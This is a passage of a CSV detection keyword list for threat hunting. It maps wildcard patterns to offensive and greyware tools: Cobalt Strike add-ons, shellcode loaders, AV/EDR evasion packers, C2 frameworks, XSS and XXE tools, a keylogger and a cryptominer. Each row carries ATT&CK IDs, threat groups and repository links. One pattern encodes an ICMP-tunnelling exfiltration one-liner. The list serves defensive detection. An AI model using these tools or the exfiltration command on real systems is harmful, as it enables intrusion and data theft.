TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-macos-arm64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-macos-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-msvc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig.exe -*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrpool.eu:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xor.exe *.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","0","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" +"*xor.py *.dll*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*XOR_b64_encrypted*covenant.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*XOR_b64_encrypted*covenant2.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*XOR_b64_encrypted*havoc.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*xor_payload*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" +"*xor-bin.py *.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*xoreaxeaxeax*","offensive_tool_keyword","Github Username","github username hosting obfuscation and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xoreaxeaxeax","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*XorEncoder.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*XOR-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*xpipe \\*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*xpipe*lsass*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*xpipe.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*xpipe.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*xpipe.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*xpn*ntlmquic*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*xrdp.c*","offensive_tool_keyword","xrdp","xrdp provides a graphical login to remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. iOS and Android).can be used by attacker","T1076 - T1021.003 - T1021.002","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/neutrinolabs/xrdp","1","0","N/A","N/A","10","4824","2704","2023-10-02T15:48:32Z","2011-04-25T14:31:17Z" +"*xs.exe -connect *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*xscreensaver_log_priv_esc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*xshell_xftp_password.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*XSpear -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*xspy -display*","offensive_tool_keyword","xspy -display","Keylogger Monitors keystrokes even the keyboard is grabbed.","T1056 - T1059 - T1007 - T1113","TA0006 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/mnp/xspy/blob/master/xspy.c","1","0","N/A","N/A","1","22","15","2018-03-19T12:16:25Z","2011-07-26T18:37:00Z" +"*xsrfprobe -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*xsser -u * -g */login?password=* --Coo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*XSS-labs*","offensive_tool_keyword","xss-labs","small set of PHP scripts to practice exploiting XSS and CSRF injection vulns","T1059.003 - T1190 - T1600","TA0002 - TA0007 - ","N/A","N/A","Web Attacks","https://github.com/paralax/xss-labs","1","1","N/A","N/A","1","50","26","2017-12-22T19:38:15Z","2016-03-24T19:43:37Z" +"*XSS-Payloads*","offensive_tool_keyword","XSS-Payloads","A fine collection of selected javascript payloads.","T1059 - T1068 - T1071 - T1506","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://www.xss-payloads.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*xssrays.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssrays.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssrays_spec.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssraysdetail.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*xssraysscan.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*XSStrike*","offensive_tool_keyword","XSStrike","Advanced XSS detection and exploitation suite.","T1189","TA0001","N/A","N/A","Exploitation tools","https://github.com/UltimateHackers/XSStrike","1","0","N/A","N/A","10","12024","1823","2023-08-05T13:49:45Z","2017-06-26T07:24:44Z" +"*xxd -p -c 4 /* | while read line* do ping -c 1 -p *","greyware_tool_keyword","xxd","ICMP Tunneling One Liner","T1090 - T1002 - T1016","TA0011 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*XXEinjector*","offensive_tool_keyword","XXEinjector","XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.","T1573.001 - T1573.002 - T1574","TA0007 - ","N/A","N/A","Web Attacks","https://github.com/enjoiz/XXEinjector","1","1","N/A","N/A","10","1363","311","2020-08-27T12:33:26Z","2015-05-16T10:56:14Z" +"*xxePayloads.ini*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*XX-PHISHING-LINK-XX*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*X-YSOSERIAL-NET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Y29iYWx0c3RyaWtl*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Y2F0Y2hldHVtYm90aWZ5b3VjYW4-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*yanncam/ShuckNT*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*YaraFilters*lsassdump.yar*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*yasserjanah/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","1","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*YaWNdpwplLwycqWQDCyruhAFsYjWjnBA*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*Yaxser/Backstab*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*Yay! No SYSMON here!*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" 